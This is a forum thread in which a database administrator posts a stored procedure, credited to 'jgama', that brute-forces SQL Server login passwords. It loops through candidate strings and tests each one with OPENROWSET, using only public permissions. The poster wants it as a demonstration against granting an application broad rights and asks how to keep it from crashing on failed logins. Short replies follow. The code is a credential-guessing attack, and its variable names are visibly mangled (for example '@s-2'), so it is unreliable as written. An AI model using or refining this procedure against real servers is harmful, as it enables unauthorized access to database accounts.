openrowset crashes sp

  • I am trying to agrue against allowing a particular outside application on our SQL Server production servers.  This application allows free-form sql to be run by anyone through the application.  The application requires public permissions on the system DBs and table creation privileges on the user db.  To argue, I thought that I would demonstrate a password cracking code that all users would be allowed to implement.  I am trying to run the sp from jgama ( ) that uses public permissions only to find a password.  Unfortunately, it crashes on the openrowset when the password is invalid (but works fine if I start it with the true password).  Is there a way to keep it from crashing when the openrowset fails? 

    Thank you,



    -- from original code by jgama:

    create PROCEDURE FindSApublic (@size int)



    DECLARE @query NVARCHAR(255),@i int,@j int,@n int,@max int,@temp int, @keys VARCHAR(50),

    @dtime datetime, @s-2 VARCHAR(10), @t VARCHAR(10)

    SET @dtime=getdate()

    SET @keys='abct'

    SET @max-2=dbo.Possibilities( @size, LEN(@keys))

    SET @n=len(@keys)

    SET @s-2='a'

    SET @i=0

    create table ##temppwd (pwd  NVARCHAR(10))

    WHILE @i<@max


     SET @j-2=@i

     WHILE (@j>0)


      SET @temp=@j % (@n)-sign(len(@s))

      if @temp<0 set @temp=@n-1

      SET @j-2=@j /(@n+sign(len(@s)))

      SET @s-2=substring(@keys,@temp+1,1)+@s

      SET @t=@s


    declare @s1 NVARCHAR(10) set @s1=CONVERT(NVARCHAR(10),@s)

    set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' from OPENROWSET(''''MSDASQL'''',''''DRIVER={SQL Server};SERVER=test_server;uid=jd_test;pwd='+@s1+N''''',''''select 1 '''')'''

    exec master..xp_execresultset  @query,N'master'

    if EXISTS(select * from ##temppwd)

     GOTO lblFound

     SET @s-2=''

     SET @i=@i+1


    drop table ##temppwd

    select 'Not found after '+str(@max)+' rounds; tested up to '+@t+'.'



    drop table ##temppwd

    select 'Found: '+@s



  • This was removed by the editor as SPAM

  • You cannot use variables as OPENROWSET or OPENDATASOURCE arguments. I have had similar problems with no effective solution.

  • Carl, sorry to say... but you're wrong.  See...;%5BLN%5D;296769


    DBA with an attitude

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